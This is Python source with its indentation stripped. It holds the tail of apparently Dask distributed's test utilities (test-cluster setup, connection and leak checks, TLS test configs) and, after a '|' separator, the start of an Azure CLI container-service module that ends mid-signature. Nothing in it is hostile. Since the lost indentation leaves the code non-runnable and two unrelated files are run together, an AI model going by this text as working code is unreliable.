"pytest-timeout"
)
def _(func):
def test_func():
with clean() as loop:
if iscoroutinefunction(func):
cor = func
else:
cor = gen.coroutine(func)
loop.run_sync(cor, timeout=timeout)
return test_func
return _
async def start_cluster(
nthreads,
scheduler_addr,
loop,
security=None,
Worker=Worker,
scheduler_kwargs={},
worker_kwargs={},
):
s = await Scheduler(
loop=loop,
validate=True,
security=security,
port=0,
host=scheduler_addr,
**scheduler_kwargs,
)
workers = [
Worker(
s.address,
nthreads=ncore[1],
name=i,
security=security,
loop=loop,
validate=True,
host=ncore[0],
**(merge(worker_kwargs, ncore[2]) if len(ncore) > 2 else worker_kwargs),
)
for i, ncore in enumerate(nthreads)
]
await asyncio.gather(*workers)
start = time()
while len(s.workers) < len(nthreads) or any(
comm.comm is None for comm in s.stream_comms.values()
):
await asyncio.sleep(0.01)
if time() > start + 30:
await asyncio.gather(*(w.close(timeout=1) for w in workers))
await s.close(fast=True)
raise TimeoutError("Cluster creation timeout")
return s, workers
async def end_cluster(s, workers):
logger.debug("Closing out test cluster")
async def end_worker(w):
with suppress(TimeoutError, CommClosedError, EnvironmentError):
await w.close(report=False)
await asyncio.gather(*(end_worker(w) for w in workers))
await s.close() # wait until scheduler stops completely
s.stop()
def gen_cluster(
nthreads=[("127.0.0.1", 1), ("127.0.0.1", 2)],
ncores=None,
scheduler="127.0.0.1",
timeout=_TEST_TIMEOUT,
security=None,
Worker=Worker,
client=False,
scheduler_kwargs={},
worker_kwargs={},
client_kwargs={},
active_rpc_timeout=1,
config={},
clean_kwargs={},
allow_unclosed=False,
):
from distributed import Client
""" Coroutine test with small cluster
@gen_cluster()
async def test_foo(scheduler, worker1, worker2):
await ... # use tornado coroutines
@pytest.mark.parametrize("param", [1, 2, 3])
@gen_cluster()
async def test_foo(scheduler, worker1, worker2, param):
await ... # use tornado coroutines
@gen_cluster()
async def test_foo(scheduler, worker1, worker2, pytest_fixture_a, pytest_fixture_b):
await ... # use tornado coroutines
See also:
start
end
"""
assert timeout, (
"timeout should always be set and it should be smaller than the global one from"
"pytest-timeout"
)
if ncores is not None:
warnings.warn("ncores= has moved to nthreads=", stacklevel=2)
nthreads = ncores
scheduler_kwargs = merge(
{"dashboard": False, "dashboard_address": ":0"}, scheduler_kwargs
)
worker_kwargs = merge(
{"memory_limit": system.MEMORY_LIMIT, "death_timeout": 15}, worker_kwargs
)
def _(func):
if not iscoroutinefunction(func):
func = gen.coroutine(func)
@functools.wraps(func)
def test_func(*outer_args, **kwargs):
result = None
workers = []
with clean(timeout=active_rpc_timeout, **clean_kwargs) as loop:
async def coro():
with dask.config.set(config):
s = False
for _ in range(60):
try:
s, ws = await start_cluster(
nthreads,
scheduler,
loop,
security=security,
Worker=Worker,
scheduler_kwargs=scheduler_kwargs,
worker_kwargs=worker_kwargs,
)
except Exception as e:
logger.error(
"Failed to start gen_cluster: "
f"{e.__class__.__name__}: {e}; retrying",
exc_info=True,
)
await asyncio.sleep(1)
else:
workers[:] = ws
args = [s] + workers
break
if s is False:
raise Exception("Could not start cluster")
if client:
c = await Client(
s.address,
loop=loop,
security=security,
asynchronous=True,
**client_kwargs,
)
args = [c] + args
try:
future = func(*args, *outer_args, **kwargs)
future = asyncio.wait_for(future, timeout)
result = await future
if s.validate:
s.validate_state()
finally:
if client and c.status not in ("closing", "closed"):
await c._close(fast=s.status == Status.closed)
await end_cluster(s, workers)
await asyncio.wait_for(cleanup_global_workers(), 1)
try:
c = await default_client()
except ValueError:
pass
else:
await c._close(fast=True)
def get_unclosed():
return [c for c in Comm._instances if not c.closed()] + [
c
for c in _global_clients.values()
if c.status != "closed"
]
try:
start = time()
while time() < start + 60:
gc.collect()
if not get_unclosed():
break
await asyncio.sleep(0.05)
else:
if allow_unclosed:
print(f"Unclosed Comms: {get_unclosed()}")
else:
raise RuntimeError("Unclosed Comms", get_unclosed())
finally:
Comm._instances.clear()
_global_clients.clear()
return result
result = loop.run_sync(
coro, timeout=timeout * 2 if timeout else timeout
)
for w in workers:
if getattr(w, "data", None):
try:
w.data.clear()
except OSError:
# zict backends can fail if their storage directory
# was already removed
pass
del w.data
return result
# Patch the signature so pytest can inject fixtures
orig_sig = inspect.signature(func)
args = [None] * (1 + len(nthreads)) # scheduler, *workers
if client:
args.insert(0, None)
bound = orig_sig.bind_partial(*args)
test_func.__signature__ = orig_sig.replace(
parameters=[
p
for name, p in orig_sig.parameters.items()
if name not in bound.arguments
]
)
return test_func
return _
def raises(func, exc=Exception):
try:
func()
return False
except exc:
return True
def terminate_process(proc):
if proc.poll() is None:
if sys.platform.startswith("win"):
proc.send_signal(signal.CTRL_BREAK_EVENT)
else:
proc.send_signal(signal.SIGINT)
try:
proc.wait(30)
finally:
# Make sure we don't leave the process lingering around
with suppress(OSError):
proc.kill()
@contextmanager
def popen(args, **kwargs):
kwargs["stdout"] = subprocess.PIPE
kwargs["stderr"] = subprocess.PIPE
if sys.platform.startswith("win"):
# Allow using CTRL_C_EVENT / CTRL_BREAK_EVENT
kwargs["creationflags"] = subprocess.CREATE_NEW_PROCESS_GROUP
dump_stdout = False
args = list(args)
if sys.platform.startswith("win"):
args[0] = os.path.join(sys.prefix, "Scripts", args[0])
else:
args[0] = os.path.join(
os.environ.get("DESTDIR", "") + sys.prefix, "bin", args[0]
)
proc = subprocess.Popen(args, **kwargs)
try:
yield proc
except Exception:
dump_stdout = True
raise
finally:
try:
terminate_process(proc)
finally:
# XXX Also dump stdout if return code != 0 ?
out, err = proc.communicate()
if dump_stdout:
print("\n\nPrint from stderr\n %s\n=================\n" % args[0][0])
print(err.decode())
print("\n\nPrint from stdout\n=================\n")
print(out.decode())
def wait_for_port(address, timeout=5):
assert isinstance(address, tuple)
deadline = time() + timeout
while True:
timeout = deadline - time()
if timeout < 0:
raise RuntimeError(f"Failed to connect to {address}")
try:
sock = socket.create_connection(address, timeout=timeout)
except OSError:
pass
else:
sock.close()
break
def wait_for(predicate, timeout, fail_func=None, period=0.001):
deadline = time() + timeout
while not predicate():
sleep(period)
if time() > deadline:
if fail_func is not None:
fail_func()
pytest.fail(f"condition not reached until {timeout} seconds")
async def async_wait_for(predicate, timeout, fail_func=None, period=0.001):
deadline = time() + timeout
while not predicate():
await asyncio.sleep(period)
if time() > deadline:
if fail_func is not None:
fail_func()
pytest.fail(f"condition not reached until {timeout} seconds")
@memoize
def has_ipv6():
"""
Return whether IPv6 is locally functional. This doesn't guarantee IPv6
is properly configured outside of localhost.
"""
if os.getenv("DISABLE_IPV6") == "1":
return False
serv = cli = None
try:
serv = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
serv.bind(("::", 0))
serv.listen(5)
cli = socket.create_connection(serv.getsockname()[:2])
return True
except OSError:
return False
finally:
if cli is not None:
cli.close()
if serv is not None:
serv.close()
if has_ipv6():
def requires_ipv6(test_func):
return test_func
else:
requires_ipv6 = pytest.mark.skip("ipv6 required")
async def assert_can_connect(addr, timeout=0.5, **kwargs):
"""
Check that it is possible to connect to the distributed *addr*
within the given *timeout*.
"""
comm = await connect(addr, timeout=timeout, **kwargs)
comm.abort()
async def assert_cannot_connect(
addr, timeout=0.5, exception_class=EnvironmentError, **kwargs
):
"""
Check that it is impossible to connect to the distributed *addr*
within the given *timeout*.
"""
with pytest.raises(exception_class):
comm = await connect(addr, timeout=timeout, **kwargs)
comm.abort()
async def assert_can_connect_from_everywhere_4_6(port, protocol="tcp", **kwargs):
"""
Check that the local *port* is reachable from all IPv4 and IPv6 addresses.
"""
futures = [
assert_can_connect("%s://127.0.0.1:%d" % (protocol, port), **kwargs),
assert_can_connect("%s://%s:%d" % (protocol, get_ip(), port), **kwargs),
]
if has_ipv6():
futures += [
assert_can_connect("%s://[::1]:%d" % (protocol, port), **kwargs),
assert_can_connect("%s://[%s]:%d" % (protocol, get_ipv6(), port), **kwargs),
]
await asyncio.gather(*futures)
async def assert_can_connect_from_everywhere_4(port, protocol="tcp", **kwargs):
"""
Check that the local *port* is reachable from all IPv4 addresses.
"""
futures = [
assert_can_connect("%s://127.0.0.1:%d" % (protocol, port), **kwargs),
assert_can_connect("%s://%s:%d" % (protocol, get_ip(), port), **kwargs),
]
if has_ipv6():
futures += [
assert_cannot_connect("%s://[::1]:%d" % (protocol, port), **kwargs),
assert_cannot_connect(
"%s://[%s]:%d" % (protocol, get_ipv6(), port), **kwargs
),
]
await asyncio.gather(*futures)
async def assert_can_connect_locally_4(port, **kwargs):
"""
Check that the local *port* is only reachable from local IPv4 addresses.
"""
futures = [assert_can_connect("tcp://127.0.0.1:%d" % port, **kwargs)]
if get_ip() != "127.0.0.1": # No outside IPv4 connectivity?
futures += [assert_cannot_connect("tcp://%s:%d" % (get_ip(), port), **kwargs)]
if has_ipv6():
futures += [
assert_cannot_connect("tcp://[::1]:%d" % port, **kwargs),
assert_cannot_connect("tcp://[%s]:%d" % (get_ipv6(), port), **kwargs),
]
await asyncio.gather(*futures)
async def assert_can_connect_from_everywhere_6(port, **kwargs):
"""
Check that the local *port* is reachable from all IPv6 addresses.
"""
assert has_ipv6()
futures = [
assert_cannot_connect("tcp://127.0.0.1:%d" % port, **kwargs),
assert_cannot_connect("tcp://%s:%d" % (get_ip(), port), **kwargs),
assert_can_connect("tcp://[::1]:%d" % port, **kwargs),
assert_can_connect("tcp://[%s]:%d" % (get_ipv6(), port), **kwargs),
]
await asyncio.gather(*futures)
async def assert_can_connect_locally_6(port, **kwargs):
"""
Check that the local *port* is only reachable from local IPv6 addresses.
"""
assert has_ipv6()
futures = [
assert_cannot_connect("tcp://127.0.0.1:%d" % port, **kwargs),
assert_cannot_connect("tcp://%s:%d" % (get_ip(), port), **kwargs),
assert_can_connect("tcp://[::1]:%d" % port, **kwargs),
]
if get_ipv6() != "::1": # No outside IPv6 connectivity?
futures += [
assert_cannot_connect("tcp://[%s]:%d" % (get_ipv6(), port), **kwargs)
]
await asyncio.gather(*futures)
@contextmanager
def captured_logger(logger, level=logging.INFO, propagate=None):
"""Capture output from the given Logger."""
if isinstance(logger, str):
logger = logging.getLogger(logger)
orig_level = logger.level
orig_handlers = logger.handlers[:]
if propagate is not None:
orig_propagate = logger.propagate
logger.propagate = propagate
sio = io.StringIO()
logger.handlers[:] = [logging.StreamHandler(sio)]
logger.setLevel(level)
try:
yield sio
finally:
logger.handlers[:] = orig_handlers
logger.setLevel(orig_level)
if propagate is not None:
logger.propagate = orig_propagate
@contextmanager
def captured_handler(handler):
"""Capture output from the given logging.StreamHandler."""
assert isinstance(handler, logging.StreamHandler)
orig_stream = handler.stream
handler.stream = io.StringIO()
try:
yield handler.stream
finally:
handler.stream = orig_stream
@contextmanager
def new_config(new_config):
"""
Temporarily change configuration dictionary.
"""
from .config import defaults
config = dask.config.config
orig_config = copy.deepcopy(config)
try:
config.clear()
config.update(copy.deepcopy(defaults))
dask.config.update(config, new_config)
initialize_logging(config)
yield
finally:
config.clear()
config.update(orig_config)
initialize_logging(config)
@contextmanager
def new_environment(changes):
saved_environ = os.environ.copy()
os.environ.update(changes)
try:
yield
finally:
os.environ.clear()
os.environ.update(saved_environ)
@contextmanager
def new_config_file(c):
"""
Temporarily change configuration file to match dictionary *c*.
"""
import yaml
old_file = os.environ.get("DASK_CONFIG")
fd, path = tempfile.mkstemp(prefix="dask-config")
try:
with os.fdopen(fd, "w") as f:
f.write(yaml.dump(c))
os.environ["DASK_CONFIG"] = path
try:
yield
finally:
if old_file:
os.environ["DASK_CONFIG"] = old_file
else:
del os.environ["DASK_CONFIG"]
finally:
os.remove(path)
certs_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), "tests"))
def get_cert(filename):
"""
Get the path to one of the test TLS certificates.
"""
path = os.path.join(certs_dir, filename)
assert os.path.exists(path), path
return path
def tls_config():
"""
A functional TLS configuration with our test certs.
"""
ca_file = get_cert("tls-ca-cert.pem")
keycert = get_cert("tls-key-cert.pem")
return {
"distributed": {
"comm": {
"tls": {
"ca-file": ca_file,
"client": {"cert": keycert},
"scheduler": {"cert": keycert},
"worker": {"cert": keycert},
}
}
}
}
def tls_only_config():
"""
A functional TLS configuration with our test certs, disallowing
plain TCP communications.
"""
c = tls_config()
c["distributed"]["comm"]["require-encryption"] = True
return c
def tls_security():
"""
A Security object with proper TLS configuration.
"""
with new_config(tls_config()):
sec = Security()
return sec
def tls_only_security():
"""
A Security object with proper TLS configuration and disallowing plain
TCP communications.
"""
with new_config(tls_only_config()):
sec = Security()
assert sec.require_encryption
return sec
def get_server_ssl_context(
certfile="tls-cert.pem", keyfile="tls-key.pem", ca_file="tls-ca-cert.pem"
):
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH, cafile=get_cert(ca_file))
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_cert_chain(get_cert(certfile), get_cert(keyfile))
return ctx
def get_client_ssl_context(
certfile="tls-cert.pem", keyfile="tls-key.pem", ca_file="tls-ca-cert.pem"
):
ctx = ssl.create_default_context(ssl.Purpose.SERVER_AUTH, cafile=get_cert(ca_file))
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_cert_chain(get_cert(certfile), get_cert(keyfile))
return ctx
def bump_rlimit(limit, desired):
resource = pytest.importorskip("resource")
try:
soft, hard = resource.getrlimit(limit)
if soft < desired:
resource.setrlimit(limit, (desired, max(hard, desired)))
except Exception as e:
pytest.skip(f"rlimit too low ({soft}) and can't be increased: {e}")
def gen_tls_cluster(**kwargs):
kwargs.setdefault("nthreads", [("tls://127.0.0.1", 1), ("tls://127.0.0.1", 2)])
return gen_cluster(
scheduler="tls://127.0.0.1", security=tls_only_security(), **kwargs
)
@contextmanager
def save_sys_modules():
old_modules = sys.modules
old_path = sys.path
try:
yield
finally:
for i, elem in enumerate(sys.path):
if elem not in old_path:
del sys.path[i]
for elem in sys.modules.keys():
if elem not in old_modules:
del sys.modules[elem]
@contextmanager
def check_thread_leak():
"""Context manager to ensure we haven't leaked any threads"""
active_threads_start = threading.enumerate()
yield
start = time()
while True:
bad_threads = [
thread
for thread in threading.enumerate()
if thread not in active_threads_start
and "Threaded" not in thread.name
and "watch message" not in thread.name
and "TCP-Executor" not in thread.name
# TODO: Make sure profile thread is cleaned up
# and remove the line below
and "Profile" not in thread.name
]
if not bad_threads:
break
else:
sleep(0.01)
if time() > start + 5:
# Raise an error with information about leaked threads
from distributed import profile
bad_thread = bad_threads[0]
call_stacks = profile.call_stack(sys._current_frames()[bad_thread.ident])
assert False, (bad_thread, call_stacks)
@contextmanager
def check_process_leak(check=True):
for proc in mp_context.active_children():
proc.terminate()
yield
if check:
for i in range(200):
if not set(mp_context.active_children()):
break
else:
sleep(0.2)
else:
assert not mp_context.active_children()
for proc in mp_context.active_children():
proc.terminate()
@contextmanager
def check_instances():
Client._instances.clear()
Worker._instances.clear()
Scheduler._instances.clear()
SpecCluster._instances.clear()
Worker._initialized_clients.clear()
# assert all(n.status == "closed" for n in Nanny._instances), {
# n: n.status for n in Nanny._instances
# }
Nanny._instances.clear()
_global_clients.clear()
Comm._instances.clear()
yield
start = time()
while set(_global_clients):
sleep(0.1)
assert time() < start + 10
_global_clients.clear()
for w in Worker._instances:
with suppress(RuntimeError): # closed IOLoop
w.loop.add_callback(w.close, report=False, executor_wait=False)
if w.status in (Status.running, Status.paused):
w.loop.add_callback(w.close)
Worker._instances.clear()
start = time()
while any(c.status != "closed" for c in Worker._initialized_clients):
sleep(0.1)
assert time() < start + 10
Worker._initialized_clients.clear()
for i in range(5):
if all(c.closed() for c in Comm._instances):
break
else:
sleep(0.1)
else:
L = [c for c in Comm._instances if not c.closed()]
Comm._instances.clear()
print("Unclosed Comms", L)
# raise ValueError("Unclosed Comms", L)
assert all(
n.status == Status.closed or n.status == Status.init for n in Nanny._instances
), {n: n.status for n in Nanny._instances}
# assert not list(SpecCluster._instances) # TODO
assert all(c.status == Status.closed for c in SpecCluster._instances), list(
SpecCluster._instances
)
SpecCluster._instances.clear()
Nanny._instances.clear()
DequeHandler.clear_all_instances()
@contextmanager
def clean(threads=not WINDOWS, instances=True, timeout=1, processes=True):
with check_thread_leak() if threads else nullcontext():
with pristine_loop() as loop:
with check_process_leak(check=processes):
with check_instances() if instances else nullcontext():
with check_active_rpc(loop, timeout):
reset_config()
dask.config.set({"distributed.comm.timeouts.connect": "5s"})
# Restore default logging levels
# XXX use pytest hooks/fixtures instead?
for name, level in logging_levels.items():
logging.getLogger(name).setLevel(level)
yield loop
with suppress(AttributeError):
del thread_state.on_event_loop_thread
@pytest.fixture
def cleanup():
with clean():
yield
class TaskStateMetadataPlugin(WorkerPlugin):
"""WorkPlugin to populate TaskState.metadata"""
def setup(self, worker):
self.worker = worker
def transition(self, key, start, finish, **kwargs):
ts = self.worker.tasks[key]
if start == "ready" and finish == "executing":
ts.metadata["start_time"] = time()
elif start == "executing" and finish == "memory":
ts.metadata["stop_time"] = time()
class LockedComm(TCP):
def __init__(self, comm, read_event, read_queue, write_event, write_queue):
self.write_event = write_event
self.write_queue = write_queue
self.read_event = read_event
self.read_queue = read_queue
self.comm = comm
assert isinstance(comm, TCP)
def __getattr__(self, name):
return getattr(self.comm, name)
async def write(self, msg, serializers=None, on_error="message"):
if self.write_queue:
await self.write_queue.put((self.comm.peer_address, msg))
if self.write_event:
await self.write_event.wait()
return await self.comm.write(msg, serializers=serializers, on_error=on_error)
async def read(self, deserializers=None):
msg = await self.comm.read(deserializers=deserializers)
if self.read_queue:
await self.read_queue.put((self.comm.peer_address, msg))
if self.read_event:
await self.read_event.wait()
return msg
class _LockedCommPool(ConnectionPool):
"""A ConnectionPool wrapper to intercept network traffic between servers
This wrapper can be attached to a running server to intercept outgoing read or write requests in test environments.
Examples
--------
>>> w = await Worker(...)
>>> read_event = asyncio.Event()
>>> read_queue = asyncio.Queue()
>>> w.rpc = _LockedCommPool(
w.rpc,
read_event=read_event,
read_queue=read_queue,
)
# It might be necessary to remove all existing comms
# if the wrapped pool has been used before
>>> w.remove(remote_address)
>>> async def ping_pong():
return await w.rpc(remote_address).ping()
>>> with pytest.raises(asyncio.TimeoutError):
>>> await asyncio.wait_for(ping_pong(), 0.01)
>>> read_event.set()
>>> await ping_pong()
"""
def __init__(
self, pool, read_event=None, read_queue=None, write_event=None, write_queue=None
):
self.write_event = write_event
self.write_queue = write_queue
self.read_event = read_event
self.read_queue = read_queue
self.pool = pool
def __getattr__(self, name):
return getattr(self.pool, name)
async def connect(self, *args, **kwargs):
comm = await self.pool.connect(*args, **kwargs)
return LockedComm(
comm, self.read_event, self.read_queue, self.write_event, self.write_queue
)
|
custom.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from __future__ import print_function
import binascii
import datetime
import errno
import json
import os
import os.path
import platform
import random
import re
import ssl
import stat
import string
import subprocess
import sys
import tempfile
import threading
import time
import uuid
import webbrowser
from six.moves.urllib.request import urlopen # pylint: disable=import-error
from six.moves.urllib.error import URLError # pylint: disable=import-error
import yaml
import dateutil.parser
from dateutil.relativedelta import relativedelta
from knack.log import get_logger
from knack.util import CLIError
from msrestazure.azure_exceptions import CloudError
import requests
from azure.cli.command_modules.acs import acs_client, proxy
from azure.cli.command_modules.acs._params import regions_in_preview, regions_in_prod
from azure.cli.core.api import get_config_dir
from azure.cli.core._profile import Profile
from azure.cli.core.commands.client_factory import get_mgmt_service_client
from azure.cli.core.keys import is_valid_ssh_rsa_public_key
from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, truncate_text, sdk_no_wait
from azure.graphrbac.models import (ApplicationCreateParameters,
PasswordCredential,
KeyCredential,
ServicePrincipalCreateParameters,
GetObjectsParameters)
from azure.mgmt.containerservice.models import ContainerServiceLinuxProfile
from azure.mgmt.containerservice.models import ContainerServiceNetworkProfile
from azure.mgmt.containerservice.models import ContainerServiceOrchestratorTypes
from azure.mgmt.containerservice.models import ContainerServiceServicePrincipalProfile
from azure.mgmt.containerservice.models import ContainerServiceSshConfiguration
from azure.mgmt.containerservice.models import ContainerServiceSshPublicKey
from azure.mgmt.containerservice.models import ContainerServiceStorageProfileTypes
from azure.mgmt.containerservice.models import ManagedCluster
from azure.mgmt.containerservice.models import ManagedClusterAADProfile
from azure.mgmt.containerservice.models import ManagedClusterAddonProfile
from azure.mgmt.containerservice.models import ManagedClusterAgentPoolProfile
from ._client_factory import cf_container_services
from ._client_factory import cf_resource_groups
from ._client_factory import get_auth_management_client
from ._client_factory import get_graph_rbac_management_client
from ._client_factory import cf_resources
logger = get_logger(__name__)
# pylint:disable=too-many-lines,unused-argument
def which(binary):
path_var = os.getenv('PATH')
if platform.system() == 'Windows':
binary = binary + '.exe'
parts = path_var.split(';')
else:
parts = path_var.split(':')
for part in parts:
bin_path = os.path.join(part, binary)
if os.path.exists(bin_path) and os.path.isfile(bin_path) and os.access(bin_path, os.X_OK):
return bin_path
return None
def wait_then_open(url):
"""
Waits for a bit then opens a URL. Useful for waiting for a proxy to come up, and then open the URL.
"""
for _ in range(1, 10):
try:
urlopen(url, context=_ssl_context())
except URLError:
time.sleep(1)
break
webbrowser.open_new_tab(url)
def wait_then_open_async(url):
"""
Spawns a thread that waits for a bit then opens a URL.
"""
t = threading.Thread(target=wait_then_open, args=({url}))
t.daemon = True
t.start()
def acs_browse(cmd, client, resource_group, name, disable_browser=False, ssh_key_file=None):
"""
Opens a browser to the web interface for the cluster orchestrator
:param name: Name of the target Azure container service instance.
:type name: String
:param resource_group_name: Name of Azure container service's resource group.
:type resource_group_name: String
:param disable_browser: If true, don't launch a web browser after estabilishing the proxy
:type disable_browser: bool
:param ssh_key_file: If set a path to an SSH key to use, only applies to DCOS
:type ssh_key_file: string
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group)
_acs_browse_internal(cmd, client, acs_info, resource_group, name, disable_browser, ssh_key_file)
def _acs_browse_internal(cmd, client, acs_info, resource_group, name, disable_browser, ssh_key_file):
orchestrator_type = acs_info.orchestrator_profile.orchestrator_type # pylint: disable=no-member
if str(orchestrator_type).lower() == 'kubernetes' or \
orchestrator_type == ContainerServiceOrchestratorTypes.kubernetes or \
(acs_info.custom_profile and acs_info.custom_profile.orchestrator == 'kubernetes'): # pylint: disable=no-member
return k8s_browse(cmd, client, name, resource_group, disable_browser, ssh_key_file=ssh_key_file)
elif str(orchestrator_type).lower() == 'dcos' or orchestrator_type == ContainerServiceOrchestratorTypes.dcos:
return _dcos_browse_internal(acs_info, disable_browser, ssh_key_file)
else:
raise CLIError('Unsupported orchestrator type {} for browse'.format(orchestrator_type))
def k8s_browse(cmd, client, name, resource_group, disable_browser=False, ssh_key_file=None):
"""
Launch a proxy and browse the Kubernetes web UI.
:param disable_browser: If true, don't launch a web browser after estabilishing the proxy
:type disable_browser: bool
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group)
_k8s_browse_internal(name, acs_info, disable_browser, ssh_key_file)
def _k8s_browse_internal(name, acs_info, disable_browser, ssh_key_file):
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
browse_path = os.path.join(get_config_dir(), 'acsBrowseConfig.yaml')
if os.path.exists(browse_path):
os.remove(browse_path)
_k8s_get_credentials_internal(name, acs_info, browse_path, ssh_key_file, False)
logger.warning('Proxy running on 127.0.0.1:8001/ui')
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async('http://127.0.0.1:8001/ui')
subprocess.call(["kubectl", "--kubeconfig", browse_path, "proxy"])
def dcos_browse(cmd, client, name, resource_group, disable_browser=False, ssh_key_file=None):
"""
Creates an SSH tunnel to the Azure container service, and opens the Mesosphere DC/OS dashboard in the browser.
:param name: name: Name of the target Azure container service instance.
:type name: String
:param resource_group_name: Name of Azure container service's resource group.
:type resource_group_name: String
:param disable_browser: If true, don't launch a web browser after estabilishing the proxy
:type disable_browser: bool
:param ssh_key_file: Path to the SSH key to use
:type ssh_key_file: string
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group)
_dcos_browse_internal(acs_info, disable_browser, ssh_key_file)
def _dcos_browse_internal(acs_info, disable_browser, ssh_key_file):
if not os.path.isfile(ssh_key_file):
raise CLIError('Private key file {} does not exist'.format(ssh_key_file))
acs = acs_client.ACSClient()
if not acs.connect(_get_host_name(acs_info), _get_username(acs_info),
key_filename=ssh_key_file):
raise CLIError('Error connecting to ACS: {}'.format(_get_host_name(acs_info)))
octarine_bin = '/opt/mesosphere/bin/octarine'
if not acs.file_exists(octarine_bin):
raise CLIError('Proxy server ({}) does not exist on the cluster.'.format(octarine_bin))
proxy_id = _rand_str(16)
proxy_cmd = '{} {}'.format(octarine_bin, proxy_id)
acs.run(proxy_cmd, background=True)
# Parse the output to get the remote PORT
proxy_client_cmd = '{} --client --port {}'.format(octarine_bin, proxy_id)
stdout, _ = acs.run(proxy_client_cmd)
remote_port = int(stdout.read().decode().strip())
local_port = acs.get_available_local_port()
# Set the proxy
proxy.set_http_proxy('127.0.0.1', local_port)
logger.warning('Proxy running on 127.0.0.1:%s', local_port)
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async('http://127.0.0.1')
try:
acs.create_tunnel(
remote_host='127.0.0.1',
remote_port=remote_port,
local_port=local_port)
finally:
proxy.disable_http_proxy()
return
def acs_install_cli(cmd, client, resource_group, name, install_location=None, client_version=None):
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group)
orchestrator_type = acs_info.orchestrator_profile.orchestrator_type # pylint: disable=no-member
kwargs = {'install_location': install_location}
if client_version:
kwargs['client_version'] = client_version
if orchestrator_type == 'kubernetes':
return k8s_install_cli(**kwargs)
elif orchestrator_type == 'dcos':
return dcos_install_cli(**kwargs)
else:
raise CLIError('Unsupported orchestrator type {} for install-cli'.format(orchestrator_type))
def _ssl_context():
if sys.version_info < (3, 4) or (in_cloud_console() and platform.system() == 'Windows'):
try:
return ssl.SSLContext(ssl.PROTOCOL_TLS) # added in python 2.7.13 and 3.6
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _urlretrieve(url, filename):
req = urlopen(url, context=_ssl_context())
with open(filename, "wb") as f:
f.write(req.read())
def dcos_install_cli(cmd, install_location=None, client_version='1.8'):
"""
Downloads the dcos command line from Mesosphere
"""
system = platform.system()
if not install_location:
raise CLIError(
"No install location specified and it could not be determined from the current platform '{}'".format(
system))
base_url = 'https://downloads.dcos.io/binaries/cli/{}/x86-64/dcos-{}/{}'
if system == 'Windows':
file_url = base_url.format('windows', client_version, 'dcos.exe')
elif system == 'Linux':
# TODO Support ARM CPU here
file_url = base_url.format('linux', client_version, 'dcos')
elif system == 'Darwin':
file_url = base_url.format('darwin', client_version, 'dcos')
else:
raise CLIError('Proxy server ({}) does not exist on the cluster.'.format(system))
logger.warning('Downloading client to %s', install_location)
try:
_urlretrieve(file_url, install_location)
os.chmod(install_location,
os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
except IOError as err:
raise CLIError('Connection error while attempting to download client ({})'.format(err))
def k8s_install_cli(cmd, client_version='latest', install_location=None):
"""Install kubectl, a command-line interface for Kubernetes clusters."""
if client_version == 'latest':
context = _ssl_context()
version = urlopen('https://storage.googleapis.com/kubernetes-release/release/stable.txt',
context=context).read()
client_version = version.decode('UTF-8').strip()
else:
client_version = "v%s" % client_version
file_url = ''
system = platform.system()
base_url = 'https://storage.googleapis.com/kubernetes-release/release/{}/bin/{}/amd64/{}'
# ensure installation directory exists
install_dir, cli = os.path.dirname(install_location), os.path.basename(install_location)
if not os.path.exists(install_dir):
os.makedirs(install_dir)
if system == 'Windows':
file_url = base_url.format(client_version, 'windows', 'kubectl.exe')
elif system == 'Linux':
# TODO: Support ARM CPU here
file_url = base_url.format(client_version, 'linux', 'kubectl')
elif system == 'Darwin':
file_url = base_url.format(client_version, 'darwin', 'kubectl')
else:
raise CLIError('Proxy server ({}) does not exist on the cluster.'.format(system))
logger.warning('Downloading client to "%s" from "%s"', install_location, file_url)
try:
_urlretrieve(file_url, install_location)
os.chmod(install_location,
os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
except IOError as ex:
raise CLIError('Connection error while attempting to download client ({})'.format(ex))
if system == 'Windows': # be verbose, as the install_location likely not in Windows's search PATHs
env_paths = os.environ['PATH'].split(';')
found = next((x for x in env_paths if x.lower().rstrip('\\') == install_dir.lower()), None)
if not found:
# pylint: disable=logging-format-interpolation
logger.warning('Please add "{0}" to your search PATH so the `{1}` can be found. 2 options: \n'
' 1. Run "set PATH=%PATH%;{0}" or "$env:path += \'{0}\'" for PowerShell. '
'This is good for the current command session.\n'
' 2. Update system PATH environment variable by following '
'"Control Panel->System->Advanced->Environment Variables", and re-open the command window. '
'You only need to do it once'.format(install_dir, cli))
else:
logger.warning('Please ensure that %s is in your search PATH, so the `%s` command can be found.',
install_dir, cli)
def k8s_install_connector(cmd, client, name, resource_group_name, connector_name='aci-connector',
location=None, service_principal=None, client_secret=None,
chart_url=None, os_type='Linux', image_tag=None, aci_resource_group=None):
_k8s_install_or_upgrade_connector("install", cmd, client, name, resource_group_name, connector_name,
location, service_principal, client_secret, chart_url, os_type,
image_tag, aci_resource_group)
def k8s_upgrade_connector(cmd, client, name, resource_group_name, connector_name='aci-connector',
location=None, service_principal=None, client_secret=None,
chart_url=None, os_type='Linux', image_tag=None, aci_resource_group=None):
_k8s_install_or_upgrade_connector("upgrade", cmd, client, name, resource_group_name, connector_name,
location, service_principal, client_secret, chart_url, os_type,
image_tag, aci_resource_group)
def _k8s_install_or_upgrade_connector(helm_cmd, cmd, client, name, resource_group_name, connector_name,
